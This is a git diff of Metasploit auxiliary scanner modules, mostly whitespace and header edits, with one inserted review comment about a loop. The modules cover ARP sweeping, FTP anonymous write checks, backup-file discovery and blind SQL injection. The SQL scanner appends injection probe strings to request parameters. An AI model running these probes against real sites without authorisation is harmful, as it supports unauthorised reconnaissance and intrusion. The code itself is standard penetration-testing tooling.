@@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'ARP Sweep Local Network Discovery', @@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'belch', 'License' => MSF_LICENSE ) - + register_options([ OptString.new('SHOST', [true, "Source IP Address"]), OptString.new('SMAC', [true, "Source MAC Address"]), ], self.class) - + deregister_options('SNAPLEN', 'FILTER') end @@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary end def run_batch(hosts) - - shost = datastore['SHOST'] + + shost = datastore['SHOST'] smac = datastore['SMAC'] - - open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"}) + + open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"}) begin - + hosts.each do |dhost| probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost) capture.inject(probe) 
@@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary while(reply = getreply()) next if not reply[:arp] print_status("#{reply[:arp].spa} appears to be up.") - + report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) end end - + etime = Time.now.to_f + (hosts.length * 0.05) while (Time.now.to_f < etime) while(reply = getreply()) next if not reply[:arp] print_status("#{reply[:arp].spa} appears to be up.") - + report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) end Kernel.select(nil, nil, nil, 0.50) end - + ensure close_pcap() end end - + def buildprobe(shost, smac, dhost) n = Racket::Racket.new n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14)) n.l2.src_mac = smac n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff' n.l2.ethertype = 0x0806 - + n.l3 = Racket::L3::ARP.new n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST n.l3.sha = n.l2.src_mac @@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary n.l3.tpa = dhost n.pack end - + def getreply pkt = capture.next return if not pkt - + eth = Racket::L2::Ethernet.new(pkt) return if not eth.ethertype == 0x0806 diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 5aeb002a06..b460be6f5c 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'EMC AlphaStor Device Manager Service.', 
@@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'MC', 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(3000),], self.class) end @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary connect pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512 - + sock.put(pkt) sleep(0.25) @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Host #{ip} is running the EMC AlphaStor Device Manager.") else print_error("Host #{ip} is not running the service...") - end + end disconnect diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 881cf455e3..eb04d0f52e 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'EMC AlphaStor Library Manager Service.', @@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'MC', 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(3500),], self.class) end @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary connect pkt = "\x51" + "\x00" * 529 - + sock.put(pkt) sleep(1) @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Host #{ip} is running the EMC AlphaStor Library Manager.") else print_error("Host #{ip} is not running the service...") - end + end disconnect 
diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index f03466b7b5..72d9ad4f6d 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'Matteo Cantoni ', 'License' => MSF_LICENSE ) - + register_options( [ Opt::RPORT(21), @@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(target_host) begin - + res = connect_login(true, false) banner.strip! if banner dir = Rex::Text.rand_text_alpha(8) - if res + if res write_check = send_cmd( ['MKD', dir] , true) if (write_check and write_check =~ /^2/) @@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary end disconnect - + rescue ::Interrupt raise $! rescue ::Rex::ConnectionError, ::IOError end - + end end diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index e43cee14a3..723286bc9d 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Backup File Scanner', 'Description' => %q{ - This module identifies the existence of possible copies + This module identifies the existence of possible copies of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp']) - ], self.class) - + ], self.class) + end def run_host(ip) @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary '.backup', '.bak', '.copy', - '.old', + '.old', '.orig', '.temp', '.txt', @@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{file}") - + report_note( :host => ip, :proto => 'HTTP', @@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary :type => 'BACKUP_FILE', :data => "#{file}" ) - + else - print_status("NOT Found #{wmap_base_url}#{file}") + print_status("NOT Found #{wmap_base_url}#{file}") #To be removed or just displayed with verbose debugging. end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - - + + end end diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index dddfde9c84..d425cf2003 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner', 'Description' => %q{ - This module identifies the existence of Blind SQL injection issues + This module identifies the existence of Blind SQL injection issues in GET Query parameters values. - + }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('METHOD', [true, "HTTP Method","GET"]), @@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary OptString.new('QUERY', [ false, "HTTP URI Query", '']), OptString.new('DATA', [ false, "HTTP Body Data", '']), OptString.new('COOKIE',[ false, "HTTP Cookies", '']) - ], self.class) - + ], self.class) + end def run_host(ip) - + gvars = nil pvars = nil cvars = nil - - rnum=rand(10000) - + + rnum=rand(10000) + valstr = [ - [ 'numeric', + [ 'numeric', " AND #{rnum}=#{rnum} ", " AND #{rnum}=#{rnum+1} " - ], - [ 'single quotes', + ], + [ 'single quotes', "' AND '#{rnum}'='#{rnum}", "' AND '#{rnum}'='#{rnum+1}" ], - [ 'double quotes', + [ 'double quotes', "\" AND \"#{rnum}\"=\"#{rnum}", "\" AND \"#{rnum}\"=\"#{rnum+1}" ] 
@@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary # # Dealing with empty query/data and making them hashes. # - + if !datastore['QUERY'] or datastore['QUERY'].empty? datastore['QUERY'] = nil gvars = nil else gvars = queryparse(datastore['QUERY']) #Now its a Hash end - + if !datastore['DATA'] or datastore['DATA'].empty? datastore['DATA'] = nil pvars = nil else pvars = queryparse(datastore['DATA']) end - + if !datastore['COOKIE'] or datastore['COOKIE'].empty? datastore['COOKIE'] = nil cvars = nil @@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary end - #SEND NORMAL REQUEST - + #SEND NORMAL REQUEST + begin normalres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + sigtxt = "" - + if normalres if normalres.body.empty? print_error("No body to obtain signature") return else sigtxt = normalres.body - #print_status("#{sigtxt}") + #print_status("#{sigtxt}") end else print_error("No response") return end - - #print_status("Normal request sent.") + + #print_status("Normal request sent.") valstr.each do |tarr| - + #QUERY if gvars - gvars.each do |key,value| + gvars.each do |key,value| gvars = queryparse(datastore['QUERY']) #Now its a Hash - - print_status("- Testing '#{tarr[0]}' Parameter #{key}:") + + print_status("- Testing '#{tarr[0]}' Parameter #{key}:") #SEND TRUE REQUEST gvars[key] = gvars[key]+tarr[1] - - + + begin trueres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 
@@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if normalres and trueres - - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - - reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) + + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) normalsize = normalres.body.length #print_status("nlen #{normalsize} reltlen #{reltruesize}") - - if reltruesize == normalsize + + if reltruesize == normalsize #If true it means that we have a small better chance of this being a blind sql injection. #SEND FALSE REQUEST - gvars[key] = gvars[key]+tarr[2] - - + gvars[key] = gvars[key]+tarr[2] + + begin falseres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - - if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + if falseres + #Very simple way to compare responses, this can be improved alot , at this time just the simple way relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) #true_false_dist = edit_distance(falseres.body,trueres.body) - + #print_status("rellenf #{relfalsesize}") if reltruesize > relfalsesize print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") - + report_note( :host => ip, :proto => 'HTTP', 
@@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else - print_status("NO False Response.") + print_status("NO False Response.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end else print_status("Normal and True requests are different.") @@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary end end #DATA - + if pvars - pvars.each do |key,value| + pvars.each do |key,value| pvars = queryparse(datastore['DATA']) #Now its a Hash - - print_status("- Testing '#{tarr[0]}' Parameter #{key}:") + + print_status("- Testing '#{tarr[0]}' Parameter #{key}:") #SEND TRUE REQUEST pvars[key] = pvars[key]+tarr[1] - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr @@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary end pvarstr << tkey+'='+tvalue end - - + + begin trueres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 
@@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if normalres and trueres - - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - - reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) + + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length) normalsize = normalres.body.length #print_status("nlen #{normalsize} reltlen #{reltruesize}") - - if reltruesize == normalsize + + if reltruesize == normalsize #If true it means that we have a small better chance of this being a blind sql injection. #SEND FALSE REQUEST pvars[key] = pvars[key]+tarr[2] - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr pvarstr << '&' end pvarstr << tkey+'='+tvalue - end - - + end + + begin falseres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => pvarstr }, 20) - - if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way + + if falseres + #Very simple way to compare responses, this can be improved alot , at this time just the simple way relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) #true_false_dist = edit_distance(falseres.body,trueres.body) - + #print_status("rellenf #{relfalsesize}") if reltruesize > relfalsesize print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") - + report_note( :host => ip, :proto => 'HTTP', 
@@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else - print_status("NO False Response.") + print_status("NO False Response.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end else print_status("Normal and True requests are different.") @@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary print_status("No response.") end end - end - - end + end + + end end end diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 07a44fe22e..39ee5c3c0c 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Copy File Scanner', 'Description' => %q{ - This module identifies the existence of possible copies + This module identifies the existence of possible copies of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp']) - ], self.class) - + ], self.class) + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), - OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) - ], self.class) - + OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) + ], self.class) + end def run_host(ip) conn = true ecode = nil emesg = nil - + ecode = datastore['ErrorCode'].to_i dm = datastore['NoDetailMessages'] - + prestr = [ 'Copy_(1)_of_', 'Copy_(2)_of_', @@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary 'Copy', '_' ] - + tpathf = datastore['PATH'] testf = tpathf.split('/').last # # Detect error code - # + # begin randfile = Rex::Text.rand_text_alpha(5).chomp filec = tpathf.sub(testf,randfile + testf) - + res = send_request_cgi({ 'uri' => filec, 'method' => 'GET', 
@@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i - + tcode = res.code.to_i + + # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) - + File.open(datastore['HTTP404Sigs']).each do |str| if(res.body.index(str)) emesg = str @@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end return if not conn @@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary if testf prestr.each do |pre| filec = tpathf.sub(testf,pre + testf) - + begin res = send_request_cgi({ 'uri' => filec, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]") + print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]") end else if ecode != 400 and res.code.to_i == 400 print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]") - else + else print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]") - + report_note( :host => ip, :proto => 'HTTP', @@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end - end + end end end diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index c51dfacaea..ddfae8d814 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Directory Listing Scanner', 'Description' => %q{ - This module identifies directory listing vulnerabilities - in a given directory path. + This module identifies directory listing vulnerabilities + in a given directory path. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path to identify directoy listing", '/']) - ], self.class) - + ], self.class) + end def run_host(ip) - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' - end + end begin res = send_request_cgi({ @@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.code >= 200 and res.code < 300) if res.to_s.include? "Index of /" and res.to_s.include? "<h1>Index of /" print_status("Found Directory Listing #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', @@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary :type => 'DIR_LISTING', :data => "#{tpath}" ) - + end if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>" print_status("Found Directory Listing #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', 
@@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary :type => 'DIR_LISTING', :data => "#{tpath}" ) - + end else - print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}") + print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb index 2876b6f35b..9bb16c000a 100644 --- a/modules/auxiliary/scanner/http/enum_delicious.rb +++ b/modules/auxiliary/scanner/http/enum_delicious.rb @@ -1,4 +1,7 @@ -#!/usr/bin/env ruby +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Del.icio.us Links (URLs) for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the + 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) + OptString.new('OUTFILE', [ false, "Where to output the list for use"]) ], self.class) register_advanced_options( 
@@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary lastpage = 1 end end - + list.delete_if{|x| x==nil} list.uniq! list.sort! - + return list end - + def write_output(data) print_status("Writing URLs list to #{datastore['OUTFILE']}...") - file_name = datastore['OUTFILE'] + file_name = datastore['OUTFILE'] if FileTest::exist?(file_name) print_status("OUTFILE already existed, appending..") else print_status("OUTFILE did not exist, creating..") end - + File.open(file_name, 'a') do |fd| fd.write(data) end - - + + end - + def run if datastore['PROXY'] @proxysrv,@proxyport = datastore['PROXY'].split(":") @@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary else @proxysrv,@proxyport = nil, nil end - + target = datastore['DOMAIN'] urls = [] print_status("Pulling urls from Delicious.com") urls = pull_urls(target) - + print_status("Located #{urls.count} addresses for #{target}") - - if datastore['OUTFILE'] + + if datastore['OUTFILE'] write_output(urls.join("\n") + "\n") else urls.each do |i| puts(i) - end + end end end end diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index c85a42876c..a8db75f847 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -1,4 +1,7 @@ -#!/usr/bin/env ruby +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Archive.org stored URLs for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of + 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, 
@@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) + OptString.new('OUTFILE', [ false, "Where to output the list for use"]) ], self.class) register_advanced_options( @@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary response.each do |line| pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2') end - + pages.delete_if{|x| x==nil} pages.uniq! pages.sort! - + for i in (0..(pages.count-1)) fix = "http://" + pages[i].to_s pages[i] = fix end return pages end - + def write_output(data) print_status("Writing URLs list to #{datastore['OUTFILE']}...") - file_name = datastore['OUTFILE'] + file_name = datastore['OUTFILE'] if FileTest::exist?(file_name) print_status("OUTFILE already existed, appending..") else print_status("OUTFILE did not exist, creating..") end - + File.open(file_name, 'a') do |fd| fd.write(data) end - - + + end - + def run if datastore['PROXY'] @proxysrv,@proxyport = datastore['PROXY'].split(":") @@ -81,21 +84,21 @@ class Metasploit3 < Msf::Auxiliary else @proxysrv,@proxyport = nil, nil end - + target = datastore['DOMAIN'] urls = [] print_status("Pulling urls from Archive.org") urls = pull_urls(target) - + print_status("Located #{urls.count} addresses for #{target}") - - if datastore['OUTFILE'] + + if datastore['OUTFILE'] write_output(urls.join("\n") + "\n") else urls.each do |i| puts(i) - end + end end end end diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 551db83b32..d9ed562b64 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb 
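Review bot: The `for i in (0..(pages.count-1))` loop in pull_urls rewrites each element in place by index, which leaks `i` and `fix` into the method scope and reads as a ported C loop; `pages.map! { |p| "http://" + p.to_s }` expresses the same operation in one line and can replace the three-line loop body. Sorting before the prefix is applied still yields the same order, since every element receives the same prefix. pull_urls begins outside this hunk.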
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -24,16 +24,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Error Based SQL Injection Scanner', 'Description' => %q{ This module identifies the existence of Error Based SQL injection issues. Still requires alot of work - + }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('METHOD', [ true, "HTTP Method",'GET']), 
